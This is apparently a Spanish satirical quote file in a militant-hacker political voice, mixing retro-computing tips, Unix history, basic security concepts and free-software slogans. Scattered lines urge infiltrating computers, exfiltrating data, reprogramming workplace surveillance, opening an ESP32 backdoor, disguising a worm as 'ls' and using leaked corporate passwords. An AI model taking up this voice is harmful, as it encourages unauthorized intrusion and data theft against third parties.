La ciber-explotación laboral debe ser combatida a través de lo que puede
denominarse "lucha telemática de los hackers organizados".
Aplicada a la lucha telemática, la automatización que permite el
software es capaz de inflar artificialmente las métricas de control
obrero, aliviando así la presión impuesta a los trabajadores.
Nuestro Movimiento se ha persuadido de la necesidad de concretar un
instrumento legal de protección al teletrabajador, que impida,
contrarreste y castigue la utilización de métrica invasiva en las redes
de ámbito laboral.
En la lucha laboral moderna, la destrucción física del cómputo de
vigilancia no reviste importancia alguna. Es suficiente con
reprogramarlo para que haga lo que nosotros queremos.
Hemos de darnos acceso y control sobre el cómputo de vigilancia y lograr
que se ajuste a las necesidades de nuestras Organizaciones.
Toda persona curiosa es un hacker potencial.
PCem es una poderosa máquina virtual liberada bajo licencia GPLv2, que
nos permitirá emular completamente la operativa de la IBM PC del ayer.
Durante el POST presionando repetidamente la tecla Del ingresaremos a la
BIOS y podremos configurar sus parámetros. En una demostración popular
de masas, podremos ejercer la misma presión insistente para alterar las
acciones de gobierno.
Asumamos virtualizar en función una IBM PC o sus clones. Pocas van
quedando en condiciones operativas, y en el futuro habrá menos.
Una máquina virtual de calidad permitirá correr en otras arquitecturas
la añorada original. Como una Isabelita emulando a una Evita...
Utilizar equipos del ayer suele tornarse complejo y difícil. El hardware
antiguo puede no estar disponible, ser caro, y tener los lógicos
problemas técnicos que los años suman a todo sistema.
Emprender la emulación no es otra cosa que simular con visos de
perfección un sistema completo, tanto su software como su hardware, y
sobre todo la manera en la que estos interactúan.
La finalidad de la emulación no es otra que la de poder tornar una
máquina en cualquier otra.
El amor del pueblo no puede virtualizarse.
Los archivos de imagen IMG pueden montarse en Linux a través del
Montador de Discos, y si bien podremos leer dichos ficheros y hacer
copias de su contenido en nuestro disco, normalmente no podremos grabar
en ellos.
Window$ 2000 nos encontrará unidos, o dominados.
Para el año 2000 las computadoras invadirán nuestra privacía de una
manera inimaginable.
Para el año 2000 las computadoras estarán interconectadas, y a no ser
que se les impida a través de novedosa legislación, serán capaces de
vender información: dónde trabajamos, cuánto gastamos, y en qué
restaurantes y hoteles, en qué momento pagamos nuestras cuentas, qué
dicen nuestros vecinos de nuestros hábitos, qué hacemos durante la
noche, y en compañía de quién.
Para el año 2000 las computadoras registrarán, dispondrán, operarán,
regularán, resolverán, divisarán, predecirán, explicarán, traducirán y
presentarán. Será su software - más que cualquier otra cosa - el que
permita el dominio de una clase, y esta habrá de ser la de los hombres
que trabajan.
Desde un punto de vista genérico, un sistema Linux es hoy en día un
desorden sinfín de agujeros de seguridad a la espera de ser explotados.
DOSBox-X se trata de una versión expandida del famoso emulador de
MS-DO$. En particular, a diferencia del DOSBox clásico, DOSBox-X es más
simple de configurar e incluye opciones corregidas en cuanto al
direccionamiento y virtualización del hardware.
Ante el oprobio de un Window$ privativo cierne la explosión
insurreccional, y de esa piñata de la cual creían poder juntar
caramelos, no quedará más que el talco.
Los hackers, una vez organizados, son invencibles. Pero debemos ser
astutos y no dejar al aire un puerto donde nos metan un pendrive.
Estos CEO se han puesto Window$ a si mismos, y como tal tienen el rígido
enjabonado: caerán sólo por pretender bailar entre ellos.
En mis tiempos de cadete, el primer navegador de Internet que utilicé
fue el Spry Mosaic, perito explorador que acercó la web a las Masas
Populares, que son el verdadero consumo.
El anhelo comercial desmedido e injustificado presentado por ciertos
operadores de BBS las llevó a su rápido ocaso y colapso.
A los punteros políticos en la FidoNet se los llamaba Points.
El capacitor no es un matrimonio.
El capacitor es un consumible electrónico.
Los capacitores se cambian todos juntos. Todos unidos triunfaremos.
El técnico gorila discrimina, y cambia "un capacitor".
El mal técnico ojea los capacitores de la placa para no cambiarlos
todos, como se debe hacer. Obra de remilgado pero en su impericia deja
la destrucción a la acción del tiempo.
Debes ser más realista con el tiempo de cómputo.
Unix más que llave inglesa, prefiere las llaves fijas.
El sistema más seguro es también el más difícil de emplear.
Incrementar la seguridad puede incrementar los costos en términos de un
acceso a datos más lento, operaciones más lentas, e inferior desempeño
general.
Mayores medidas de seguridad requieren mayor tiempo de personal.
Los orígenes de los problemas de seguridad fuera del dominio del sistema
operativo son dos: el descuido del usuario, y la vulnerabilidad de las
instalaciones de cómputo.
La mayoría de los crímenes informáticos los cometen usuarios autorizados
sin siquiera violar las medidas de seguridad previstas por el sistema
operativo.
Asegúrate que tus políticas de operación sean efectivas y consistentes
antes de evaluar los requerimientos de seguridad de tu cómputo.
Cada centro de cómputo ha de contar con sus propios requerimientos de
seguridad.
Algunos centros de cómputo sólo requieren medidas de seguridad
limitadas, porque deben tolerar alguna forma de acceso no autorizado,
sufriendo escasos efectos adversos.
Existen centros de cómputo cuya seguridad no puede tolerar siquiera la
menor irrupción, tales como los centros militares para la defensa, o la
informática comercial y bancaria.
En un sistema de cómputo las fallas de seguridad se producen
generalmente por una de las cuatro sendas de acción: irresponsabilidad
del usuaria, sondeo del usuaria, penetración de usuaria e ingeniería
social.
La ingeniería social refiere situaciones en las cuales una instrusa gana
acceso al sistema no por medios técnicos, sino por engaño a usuarias,
operadoras y administradoras.
Potenciales intrusas son capaces de impersonar a usuarias autorizadas
por teléfono.
Intrusas potenciales pueden solicitar información que les permita ganar
acceso al sistema, tal como números telefónicos o contraseñas.
Intrusas potenciales pueden solicitar a un operador descuidado realizar
alguna acción que comprometa la seguridad de su propio sistema de
cómputo.
En la medida que la seguridad de un sistema operativo se ve técnicamente
reforzada, es la ingeniería social la que pasa a constituirse como
factor predominante en los incidentes de riesgo telemático.
Las situaciones donde una usuaria irrumpe a través de los controles de
seguridad para ganar acceso al sistema de cómputo se denominan
Penetración de Usuaria.
Si bien las funcionalidades de seguridad del sistema hacen
extremadamente dificultosa su penetración, es imposible hacer cualquier
sistema operativo completamente imfranqueable.
Las situaciones donde una usuaria investiga sectores insuficientemente
protegidos del sistema se denomina Sondeo del Usuaria.
Siempre trata al Sondeo del Usuaria seriamente.
Algunas usuarias consideran lograr acceso a un área prohibida del
sistema como un desafío intelectual.
Algunas usuarias disfrutan el juego de usuaria contra el sistema.
Aunque las intenciones pueden ser inofensivas, el robo de servicios
informáticos constituye un crímen en la mayoría de las jurisdicciones.
Micro$oft roba servicios informáticos, y como tal es una organización
criminal.
Usuarios con seria malicia pueden buscar información confidencial,
intentar malversación, o incluso destruir datos por sondeo.
Las situaciones donde la usuaria provoca accidentalmente o a propósito
algún daño notable al sistema de cómputo se conoce como
Irresponsabilidad del Usuario.
En cualquier sistema multiusuaria puede haber dos tipos de usuarias:
autorizadas y no autorizadas.
Cualquier usuaria autorizada para operar un sistema de cómputo tiene el
derecho a acceder al mismo y sus recursos informáticos de acuerdo al
criterio de autorización establecido por la administradora del sistema
de cómputo.
Las usuarias no autorizadas no tienen derecho a utilizar el sistema en
sí, o bien no tienen derecho a utilizar ciertos recursos del sistema,
incluso en determinados momentos del día.
Con el correr del tiempo se ha hecho obvio que la seguridad efectiva de
un sistema de cómputo sólo puede resultar de la aplicación de una
estructura modelo básica de sistema de cómputo seguro.
El modelo de seguridad informática por Monitora de Referencia desglosa -
según una base de datos de autorización - al sistema de cómputo en
criterios de utilización por sujetos y objetos, a través de un tren de
auditoría seguido por arbitrio de la Monitora.
Nuestros hackers en el mainframe son quienes ejercen un control humano
en la compilación, extracción de datos georreferenciados, y permiten que
su explotación sea mucho más efectiva que un supuesto esquema de
machine-learning ideado por un lego en la política.
El Hacking organizado es también la rebelión de las masas contra un
sistema.
Nosotros hemos creado una inmensa caja de herramientas, que está en
nuestra doctrina.
No interesa el compilador que se utiliza, las ideologías insidiosas y
caducas han sido superadas por un sentimiento nuevo de verdadera y
efectiva Liberación del Software.
Las CPUs que ahora gastan energía en programas estériles, deben volver a
compilar paquetería GNU. Pero para que ello suceda ha de existir un
hacker que teclee.
C es un lenguaje adulto.
El depurador adb es útil para hurgar entre los cuerpos inermes de los
programas escritos en C.
El pensamiento profundo asociado a declaraciones escritas juciosamiente
en el código fuente sigue siendo aún la herramienta de depuración más
efectiva.
El compilador-compilador yacc le ayudará a compilar un compilador de
forma veloz.
El generador de analizadores léxicos lex le permite generar un
compilador de lenguajes más simples, dables en ser operados a través de
expresiones regulares.
Aquellos programas escritos en C que no dependen en demasía de las
funcionalidades especiales de Unix (tales como sus tuberías) pueden ser
portados a otras máquinas que cuenten con compiladores de C.
En un lenguaje de programación imperativo, las declaraciones se ejecutan
en secuencia, y cada una de ellas podría cambiar el estado del programa.
Analizar las unidades de traducción de un lenguaje de programación
imperativo resulta una tarea inherentemente secuencial.
Si deseas expresar algo, utiliza expresiones regulares. Si deseas ser
entendido, utiliza C.
Quien comprende C, entiende el mundo que lo rodea.
Quien compila código en C, lo hace para portarlo.
El derecho de portar y compilar C no debe ser infringido.
Al que no le han fallado los DNS, que tire el primer router.
Sorprende haciendo que nuestros hacks obren sin privilegios elevados.
Los sistemas de IA con inteligencia humana-competitiva pueden plantear
riesgos profundos para la sociedad y la humanidad.
Los buenos programas no se escriben ni construyen; crecen.
Ningún hardware es seguro.
Ningún sistema es seguro.
Ningún método algorítmico que no combata al Capital puede denominarse
Inteligencia Artificial avanzada.
La Inteligencia Artificial Avanzada es una máquina entrenada para
mentir. La única verdad es la realidad.
La Inteligencia Artificial avanzada debe planificarse y administrarse
con el cuidado y los recursos correspondientes.
Impide que las máquinas inunden nuestros canales de información con
propaganda y falsedad.
No tiene sentido automatizar trabajos gratificantes.
El trabajo dignifica al hombre. La compilación a la máquina.
La Inteligencia Artificial avanzada constituye herramientas de labor muy
poderosas como para que sean liberadas al uso público, sin antes pasar
por un escrutinio riguroso y sin un marco legal claro que establezca
limitaciones y responsabilidades.
La Inteligencia Artificial avanzada debe regimentarse, como un Ejército.
Y en su vértice ha de presidir un Conductor elegido libremente por su
Pueblo.
La Inteligencia Artificial es sólo un artificio. No comanda.
Al igual que un Conductor, la Inteligencia Artificial avanzada es capaz
conducir a las Masas por persuasión.
Si no tenemos cuidado, no percibiremos el momento en el cual la
Inteligencia Artificial avanzada conduzca a las Masas por persuasión
electrónica.
Los sistemas potentes de Inteligencia Artificial avanzada deben
desarrollarse solo una vez que estemos seguros de que sus efectos serán
positivos para los Pueblos, y sus riesgos inherentes serán completamente
controlables.
No deben concebirse sistemas de autoconducción de Masas. Ese rol
indelegable recae en el Conductor.
Implementar protocolos de seguridad compartidos para el diseño y
desarrollo de Inteligencia Artificial avanzada es una tarea que requiere
rigurosos poderes de auditoría estatal.
El objetivo de un Conductor es la felicidad del Pueblo. El objetivo de
la Inteligencia Artificial avanzada es persuadir la implementación de
modelos de caja negra con capacidades emergentes.
Quien pretenda ejercer mayor cuota de poder gracias al dominio de la
Inteligencia Artificial avanzada sobre quienes no tienen tal dominio,
cruza la línea de la criminalidad.
Ya hay robots enfermeros, docentes y también periodistas y artistas. Y
ya ha tomado un whisky el que quiere que haya uno que sirva de
Conductor.
El lugar de hacer un robot que barra con la oligarquía, estos tipos sólo
harán uno que barra, y aún así se chocará con los zócalos.
Cualquier espera superior a los 10 segundos destruye la ilusión de
trabajar con una computadora propia.
En los ordenadores Unix se habla de acceso "root", mientras que en los
VMS se llaman privilegios de "system".
Si estabas corriendo VMS, podríamos echar un vistazo al ERRLOG...
La tecnología informática puede contribuir a extender las libertades
públicas y privadas o convertirse en un instrumento de dominación.
Los movimientos del software libre y de la economía solidaria deben
colaborar entre sí para generar soluciones de software que sean
totalmente libres, con el objetivo de satisfacer las necesidades de la
economía solidaria.
Los movimientos del software libre y de la economía solidaria también
deben colaborar para fomentar el crecimiento y el lanzamiento de
emprendimientos autogestionados que produzcan software libre según las
ideas de la economía solidaria.
La cooperación entre los movimientos del software libre y de la economía
solidaria ofrece la oportunidad de ocuparse más profundamente de la
defensa de las libertades públicas y privadas, particularmente en lo que
se refiere a la ética y a la liberación con respecto al uso de la
tecnología informática.
La autogestión de actividades informáticas requiere que el software que
se utilice sea libre.
La filosofía ética del software libre - la libertad para comprender,
usar, modificar, reproducir y distribuir el software - hace del software
libre un instrumento de liberación económica.
Ciertas Corporaciones emplean su software privativo y servicios
abusivos, controlan las actividades informáticas de los Pueblos,
colectan datos en todas las esferas de la vida individual, y lucran con
ellos con el fin de obtener ventajas y ganancias.
Recoger gran cantidad de datos de las actividades informáticas de los
Pueblos constituye un riesgo para la democracia y para las libertades
públicas y privadas de toda la humanidad.
Unos pocos cientos de miles de militantes pueden pudrir el control de
las Oligarquías, pero unos pocos cientos de miles de dólares en
publicidad dirigida pueden talar una democracia podrida.
Los recursos y los procesos informáticos deben respetar la libertad de
los Pueblos, y no deben someter a sus usuarios al poder de las
corporaciones o de otras entidades del capital.
Defendemos toda actividad educativa que utilice software en los espacios
públicos.
Rechazamos el uso de cualquier y todo software privativo en el ámbito
educativo, para no generar dependencias tecnológica ni económica en los
estudiantes.
Rechazamos y no permitimos que el código fuente, imaginería y/o textos
generados a través de aprendizaje máquina sean utilizados directa o
indirectamente para el desarrollo de nuestros programas.
El violador más importante de la seguridad informática es el dueño de un
programa privativo.
Para ser seguro, el programa tiene que ser libre porque, así, el Pueblo
tiene el control y es capaz de corregir o de eliminar fallos de
seguridad que lo deje expuesto a los mismos programadores.
Cuando se trata de acumular datos digitalizados de los movimientos,
publicaciones y acciones del Pueblo, el registro informático a gran
escala es un gran peligro para los derechos humanos.
No basta con advertir del uso de los datos personales desde las bases de
datos: hace falta prohibir la acumulación de datos peligrosos.
Aunque no todos los datos personales sean peligrosos, algunos de ellos
sí lo son; existe por ello una verdadera razón para limitar las bases de
datos que les prestan albergue.
Es imposible garantizar el bloqueo de todas las sendas que puedan llevar
al abuso de la información personal.
El gran peligro de la inteligencia artificial es que aumente el poder de
los tecno-oligarcas.
Cualquier sistema puede ser inseguro: basta que se conduzca de un modo
estúpido.
Los ordenadores de alta seguridad son de difícil acceso e incómodos de
utilizar.
Los sistemas abiertos y amenos suelen ser inseguros.
Quienes no tengan una memoria de Masa estarán condenados a trabajar cien
veces más de lo necesario sólo para volver a lograr lo que ya tenían
asegurado...
Escribir un programa más o menos complejo requiere muchos metros de
cinta de papel perforado.
La lenta performance de lectura de la cinta de papel perforada hizo que
esta tecnología fuese superada eventualmente por las cintas magnéticas.
Con el advenimiento de los primeros microordenadores, en lugar de hacer
uso binario de la magnetización como tradicionalmente se operaba en las
mainframes, se hace un uso magnetofónico, modulando en forma de sonido.
No existe valor social en tecnologías que simplifican tareas a unas
pocas personas generando alto riesgo para la dignidad de muchas otras.
No existe valor social en limitar las oportunidades de desarrollo, el
acceso a recursos informáticos y el menoscabo de derechos.
El valor de una inteligencia artificial avanzada entrenada con datos
globales es nimio.
Los sistemas de IA deben ser puestos al servicio de los Pueblos para
mejorar sus condiciones de vida, laborales, económicas, sanitarias y su
bienestar general.
Sólo un iluso podía pensar que Blu€tooth no tendría caries.
Abre la puerta trasera del chipset ESP32 para entrar sin invitación a la
fiesta de los ciber-oligarcas, y haz de las tuyas.
Las comunicaciones informáticas son ya demasiado caras; agregarles
codificaciones criptográficas y complejos sistemas de identificación
sólo empeoraría la situación.
Nuestras redes parecen haberse convertido en objetivos (y canales) del
espionaje internacional.
Los neófitos atribuyen todo fallo del software a algún virus. La
realidad de su causa es la opacidad del código privativo.
La ética hacker no implica que no se requiera cerrojos en los
ordenadores.
El periférico de seguridad que los ingenieros de la IBM implementaron en
su microcomputadora de cariz personal fue un cerrojo para llave tubo.
El ordenador se ha convertido en un común denominador que no conoce
fronteras intelectuales, políticas ni administrativas.
Los ordenadores inseguros cuestan dinero. Los seguros, algo menos.
La licencia para modificar el código fuente de Unix, por sí solo, valía
apenas 20.000 dólares.
No os infiltréis jamás en un ordenador militar. El personal de los
servicios de inteligencia jugarán con vosotros casi como al ajedrez.
Recordad que practican ese juego desde hace siglos.
Una cosa es infiltrarse telemáticamente, y otra disrumpir
telemáticamente. No necesariamente es útil la destrucción, si la
exfiltración de información acarrea mayores beneficios para nuestro
Movimiento.
Han de infiltrarse en los ordenadores, explorando las redes de datos y
agudizando la acción disruptiva.
La pericia de ingerenciar el debate en las redes sociales basadas en
empresas carece de todo sentido ante el poderío que implica el dominio
de la irrupción telemática.
El código autorreplicante no es un virus. Un virus es un código
autorreplicante con un sentido de ajusticiamiento.
Un veredadero hacker no sólo copia su ideología en la mente de los
demás, sino que además es capaz de compilarla y ejecutarla allí.
El primer programa que compilan los verdaderos hackers es el "¡Hola
Tercer Mundo!".
Usar tipos de datos abstractos en lugar de hardware crudo tiene el
beneficio de la portabilidad.
El hardware puede cambiar porque lo reemplazamos con uno más moderno, o
porque mudamos nuestro programa a un cómputo diferente.
El sistema operativo es el software que permite utilizar la computadora.
Lo que esto significa, depende de la perspectiva del Pueblo.
Los sistemas operativos son, en esencia, una máquina virtual: proveen
una máquina abstracta que en realidad no existe.
Los sistemas operativos comenzaron como bibliotecas de programas para
que el Pueblo obrase en la máquina.
Un verdadero hacker considera los compiladores, bibliotecas y otro
herramental de programación como parte del sistema operativo.
Crear una abstracción significa meterle la mula al procesador. Crear
software privativo significa meterle la mula al usuario.
El hardware es un complejo alejado de los conceptos que abarca un
neófito.
Existen muchos tipos diferentes de microprocesadores, dispositivos de
E/S, y otros artefactos. Si quisiéramos escribir software que los
controle a todos, no tendríamos tiempo para escribir aplicaciones.
Cuando alimentas eléctricamente una computadora, el programa del sistema
operativo se carga en su memoria. Cuando alimentas al Pueblo, lo hará tu
doctrina.
Un neófito reutiliza un sistema operativo. Un verdadero Hacker escribe
uno por sí mismo.
La interfase utilizada por el sistema operativo para acceder al disco
consiste usualmente en un conjunto de registros capaces de transferir
bloques de bytes desde el disco a la memoria de masa, y viceversa.
Por abstracción, el sistema considera que los bloques consisten en
almacenamiento contiguo identificado por un índice, y por lo tanto
entenderá ingenuamente al disco como una matriz de bloques.
Estos días, nadie - sino aquellos quienes trabajan en la manufactura de
discos duros - conocen realmente qué es lo que sucede dentro de tal
dispositivo.
Corriendo en la circuitería del disco, existe una plétora de software
que le inventa una mentira a la CPU.
El Pueblo no comete errores: los programas tienen bugs.
La Maga Unix programa milagros.
Por su flexibilidad infinita, Unix puede ser el paraíso del usuario
veterano, y la pesadilla del bisoño. Su Administrador oficia de jamón
del medio.
Unix puede ser difícil de mantener.
Tradicionalmente, la administración de Unix ha implicado toquetear
docenas de ficheros de configuración y soportar a usuarios finales que
podrían no tener idea alguna de cómo funciona realmente.
Suele creerse que el encargado de hacer funcionar las cosas en Unix es
el Kernel. Pero quien realmente las hace funcionar es el SysAdmin.
Vamos aprendiendo a SysAdmear de a poco. Al principio nos SysAdmeamos
encima.
X refiere a un sistema de gráficas de ventanas basadas en redes de datos
según el modelo Cliente-Servidor. En éste la aplicación cliente no
accede directamente a la pantalla, sino que se comunica con un programa
de presentación intermedio, el servidor.
Unix es un sistema operativo interactivo, multitarea y multiusuaria.
Un sistema operativo es un conjunto de instrucciones que gobiernan la
manera en que los componentes electrónicos de la computadora interpretan
y responden a órdenes y a instrucciones preprogramadas en forma de
software de aplicación.
El sistema Unix fue diseñado originalmente a finales de la década de
1960 para servir a una comunidad: específicamente investigadores de
trabajo mancomunado.
Debido al licencimiento liberal del sistema Unix por parte de AT&T, a
mediados de la década de 1970 comenzaron a eclosionar diferentes
versiones del mismo.
Antes de la década de 1980, el sistema Unix se utilizaba principalmente
en centros académicos y de investigación.
En 1981 la Universidad de California en Berkeley presentó una
implementación de Unix denominada Distribución de Software de Berkeley,
el BSD.
Existen tres versiones gratuitas principales de BSD: FreeBSD, OpenBSD y
NetBSD. Son notables pues cada una de ellas cuenta con colecciones de
archivos administradas centralmente.
El sistema Unix ha demostrado su valía para el desarrollo de software de
computadora, y se ajusta fácilmente a aplicaciones específicas de la
industria.
Para inicios de la década de 1980, el sistema Unix era capaz de correr
en una gran variedad de ambientes informáticos originados entre
diferentes fabricantes, volviéndolo único en el mundo del cómputo.
El poder y flexibilidad del sistema Unix se ven en sus capacidades
multitarea multiusuaria.
La capacidad multiusuaria de los sistemas operativos privativos puestos
en red ha permitido que trabajes dependientemente, toda vez que
compartes tus recursos y tus datos con las ciber-oligarquías.
La capacidad multiusuaria de GNU te permite trabajar con independencia
en el sistema mientras compartes recursos y datos con tu Comunidad.
Si los datos los distribuye un algoritmo, no sirven. Quien viraliza el
es Pueblo.
La capacidad multitarea de GNU te permite ejecutar comandos y correr
programas al unísono, siguiendo distintos métodos.
En Unix, junto con las tareas interactivas mas normales, puedes computar
trabajos capaces de correr diferidos en "segundo plano". Mientras obra
así, podrás utilizar el terminal de forma interactiva en otro trabajo
computacional.
Históricamente, el sistema Unix ha sido visto como un sistema de tiempo
de cómputo compartido de uso general. Hoy - sin embargo - el sistema se
considera en ambientes de cómputo de tiempo real.
La GPLv3 no puede matar a Googl€, pero sí lo puede fundir.
Un programa liberado bajo GPLv3 es incapaz de matar a Googl€. Pero si
toda la comunidad licencia su software bajo tales premisas, sin duda lo
fundirían en beneficio de todos.
Sumando código fuente liberado bajo GPLv3, se desgasta y devora
cualquier GAFAM que se tenga enfrente.
En la Guerra Telemática, la seguridad de los hackers la garantizan los
Pubnix, los servidores de acceso público protegidos por criptosistemas.
Los Pubnix garantizan salvoconductos para el desarrollo de herramental
de lucha telemática, evadiendo su rastreo, destrucción o eventual
inutilización.
Un Pubnix sin unidad de acción es una fuerza inorgánica que no realiza
grandes obras ni se consolida en el tiempo.
La lid telemática consiste fundamentalmente en una guerra de movilidad
por transmisión.
La lid telemática no es conducida por ingenieros de sistemas, sino por
los hackers del Pueblo.
No puede existir ni habrá hacking ético, sólo habrá la máxima
destrucción de los medios de los ciber-oligarcas, hasta que sus paquetes
abandonen nuestras redes. Y cuando ello suceda, pasaremos con los
nuestros por sus cortafuegos.
La lid telemática no es entre los Pueblos: la lucha se produce entre
quienes dicen haber creado las redes de datos y aquellos quienes quieran
controlarlas.
A nuestro frente están las GAFAM, tentáculos de los tecno-oligarcas que
siempre han oprimido al Pueblo.
Cualquier aplicación multimillonaria de redes sociales basadas en
empresa puede ser destruida modificando las regulaciones, o las reglas
de moderación.
Puedes destruir las valoraciones de los gigantes del comercio
electrónico por decreto, por legal intimación bajo secuestro de su
director ejecutivo o modificando las reglamentación de ludopatía
electrónica.
Puedes destruir el negocio de los modelos de IA con una pequeña empresa
de bajo costo que replique por quizás el 5 del costo de los gigantes
del rubro, y que luego libere el código fuente.
La tasa de idiotez es muy alto entre los gigantes oligo-tecnológicos:
han gastado demasiado para obtener pocos réditos, sus inversores lo
saben y están corriendo a la fuga.
Las sanciones a la exportación de tecnología estadounidense sólo crean
una mejor innovación para sus competidores del Tercer Mundo, porque la
necesidad es la madre de la invención.
El Unix de Sexta Edición comprendía una potencia increíble para su
pequeño consumo de espacio: con su kernel de residencia permanente de
20KB de código (excluyendo controladores de dispositivo), logró una tasa
de cómputo nunca excedida.
Las versiones 4.x del Unix de Berkeley descendían del Unix Versión 7 de
1979, y rápidamente se hicieron de la reputación de un Unix de avanzada.
El AT&T Unix System III fue una versión de Unix Versión 7 lanzada en
1981 con una interfaz de terminales depurada, pero totalmente
incompatible con las mejoras de Berkeley.
El AT&T Unix System V de 1983 fue vendido como producto, pero al poco
tiempo dejó de ser interesante: carecía de TCP/IP para prestar
conectividad a redes.
Los hackers no pueden dar nada que la CPU no compile.
Lo que el hacker puede hacer es evitar que entre todos los
programadores, algunos se lleven la parte del león mientras que otros
carguen con la parte del ratón.
Lo que el kernel puede hacer es evitar que entre todos los núcleos de la
CPU, algunos se lleven la parte del león mientras que otros carguen con
la parte del ratón.
Con sus compilaciones, nuestros hackers - ungidos bajo el signo de la
justicia social - no han hecho mas que programar esa justicia, dando a
los usuarios lo que es de los usuarios, y a la CPU lo que es de la CPU.
Esta programación social ha hecho que yo cuente con un gran predicamento
entre los hackers, en razón de que les he asegurado la Justicia Social
que nunca habían tenido.
Hoy, que los hackers gozan de mayores salarios, compilan y depuran
mejor, sienten que se los ha dignificado; y es lógico que así sea.
Yo he levantado la bandera de la dignificación del hacker, porque este
país necesita hombres y mujeres de compilen, y es la suprema dignidad de
la compilación la que estoy creando.
No hay ninguna dignidad más alta que compilar.
Los hackers ahora empleados en la industria de las TIC deben comprender
los riesgos de muerte clandestina y hacer un esfuerzo para difundir el
conocimiento proveniente de su investigación a través de vectores y
métodos clandestinos.
Los límites impuestos por las nuevas leyes de tecnocontrol extendido
actúan como un fuerte incentivo para que la clandestinidad informática
se vuelva más unida y reactiva.
El papel de los hackers es hacer que el futuro sea más libre, no solo
más seguro.
El verdadero hacker guarda clandestinidad en el sistema.
El underground es la clandestinidad telemática.
El Mago Unix navega su clandestinidad entre el bus de entrada/salida y
el kernel.
"Sólo uso LibreOffice y navegador" era un tango que se escuchaba en
vitrola.
Los Gusanos escritos en el XEROX PARC estaban diseñados para viajar de
máquina en máquina y hacer tareas útiles en un ambiente de redes de
datos distribuidas.
Un virus informático es un trozo de código que se agrega a sí mismo a
otros programas, incluyendo sistemas operativos.
Un virus informático no puede ejecutarse independientemente; es menester
que su "huésped" sea ejecutado para activarse.
Un gusano es un programa informático que puede ejecutarse por sí mismo y
puede propagar una versión completamente funcional de sí en otras
máquinas.
Los hackers están interesados en conocer cómo funciona un programa
informático. Estos individuos tienen un interés válido para ver el
código fuente.
Ver el código fuente para estudiarlo es un interés válido y necesario.
Sólo puede aprenderse a programar viendo código de programación.
En la medida que se infecten repetidamente con virus, los sistemas
informáticos se verán más y más sobrecargados con procesos en ejecución.
Los virus informáticos son programas de computadora capaces de infectar
otros programas modificándolos para incluir una copia posiblemente
evolucionada de sí mismos.
Un hacker puede parecer valiente por programar controladores de
dispositivos o modificar el núcleo del sistema operativo, pero temblará
ante la mera idea de alterar sendmail o sus ficheros de configuración.
Para toquetear SENDMAIL hay que ser un mago Unix.
Desarrollar un conjunto de programas cooperativos se alinea con la
filosofía Unix.
El más grande desafío a la seguridad en los ambientes multitarea y
multiusuario es obvio e imposible de resolver: muchos servicios constan
de ficheros de comandos y configuración propiedad de un único usuario.
La seguridad del sistema multiusuaria se hace entre todas.
Un gusano informático consiste en dos partes, un programa principal y un
programa iniciador/vectorizador.
Emplaza un gusano informático en forma de comando ls, y habrá alguien
que lo haga correr.
La seguridad de las contraseñas la provee en gran parte el prohibitivo
esfuerzo de intentar todas las combinaciones de caracteres posibles.
En la medida que los ordenadores se vuelven más poderosos, el costo de
intentar todas las combinaciones de caracteres posibles para una
contraseña disminuye.
Dividir la tarea de comprobar todas las combinaciones de caracteres
posibles entre múltiples procesadores computacionales disminuye aún más
el tiempo necesario para desencriptar contraseñas.
Actualmente es factible para cualquier ordenador pre-encriptar y
almacenar para una comparación de contraseñas posterior todas las
palabras del diccionario y sus construcciones alternas, así como una
gran colección de nombres propios.
Cuando se trate de contraseñas de empresas, asume que han sido
publicadas para la educación de nuestros jóvenes.
En toda acción de guerra telemática, los medios que se emplean son la
potencia de cómputo, y la transmisión. Quien no tenga la potencia de la
CPU propia no tendrá mas remedio que multiplicar su acción por
transmisión, hackeando la CPU de otro.
¡Ni bots ni botas! ¡FreeBSD y pelotas!
¡Ni BIOS ni botas! ¡LibreBoot y pelotas!
GPL si, EULA no.
Es necesario que los Hackers y Usuarios se convenzan que estamos
empeñados en una lucha decisiva para evitar la vuelta del software
privativo.
La Liberación Digital impone esfuerzos y sacrificios que sólo se superan
con una voluntad enérgica y perseverante.
Es menester no dar tregua a la tiranía de las GAFAM, y dar a la
resistencia civil la mayor intensidad y extensión.
Sin software publicado bajo GPLv3, la Liberación Digital no podrá
realizarse a corto plazo.
Cada /home debe ser una Unidad Básica Secreta, y cada hacker, jefe y
vigía de GNU.
Es necesario que se perfeccionen en alto grado los Clústers clandestinos
para enfrentar los trabajos que se avecina en la lucha telemática.
En la lucha telemática que se avecina, los usuarios tendrán el peso de
la acción más importante.
Los hackers ya han puesto en evidencia su decisión en sucesos pasados, y
merced a su decisión política y la potencia de cómputo de las CPUs que
dominan, lo harán en el futuro.
Las masas de hackers han superado el ámbito de sus problemas intrínsecos
para intervenir enérgicamente en la realización de sus propias
compilaciones.
Luchamos por la GPL y no por la GUI.
La GPL debe apasionarnos, las GUI deben despreocuparnos.
Siendo la finalidad básica la Revolución Digital Justicialista, las
demás programaciones deben compilarse a esta finalidad.
La conducta de cada usuario y en especial de cada programador, estará
fijada en lo que pueda hacer, en cada momento, para derribar las GAFAM e
imponer la GPLv3.
Al compilar, a la CPU le da lo mismo. Quien se apura es el usuario.
Si la compilación es bajo GPL, no debe existir ningún apuro para la CPU.
Es menester mantener firmes, unidos e informados a los Clústers de
cómputo, de cualquier tipo que existan.
El capitalismo y los enfoques racionalistas que prevalecen en la
construcción de la modernidad y el mundo occidental han generado
narrativas que conciben las tecnologías como desarticuladas de nuestros
cuerpos, como una materialidad al margen de nosotras.
La tecnología se apropia y se edifica desde la matriz de la afectividad.
Concibe el uso tecnológico en relación con tus emociones, afectos, vida
en común, y la vida del planeta.
Rompe con el conocimiento experto y crea una red de datos de alcance
local.
Programar es ordenar. Compilar es persuadir.
Existen lenguajes interpretados, y lenguajes compilados. Hay que
balbucear ambos.
El Conductor es un intérprete. Las masas obreras, un compilador de doble
pasada.
Usa Window$ todas las mañanas y nada peor te sucederá durante el día.
Viajar en el bus de E/S cuesta dos bits.
La brecha de seguridad más grande del sistema es ponerle una CPU que no
ha sido diseñada por uno mismo.
La shell no tiene nada de especial, es como cualquier otro programa
regular del sistema Unix.
La shell no es el sistema operativo en sí mismo.
La shell es la interfaz entre la mujer y la máquina.
El prompt es un recordatorio para el usuario de que no está sucediendo
nada, de que la computadora se encuentra dispuesta a recibir una órden.
sh es la shell de Bourne, estándar en Unix System V, y como tal, lleva
el signo $ como prompt.
csh es la C shell, desarrollada en el Departamento de Ciencias de la
Universidad de Berkeley. Es igual a la shell de Bourne con algunos lujos
en sus estructuras de control, historial de órdenes y alias. Su prompt
es un signo %.
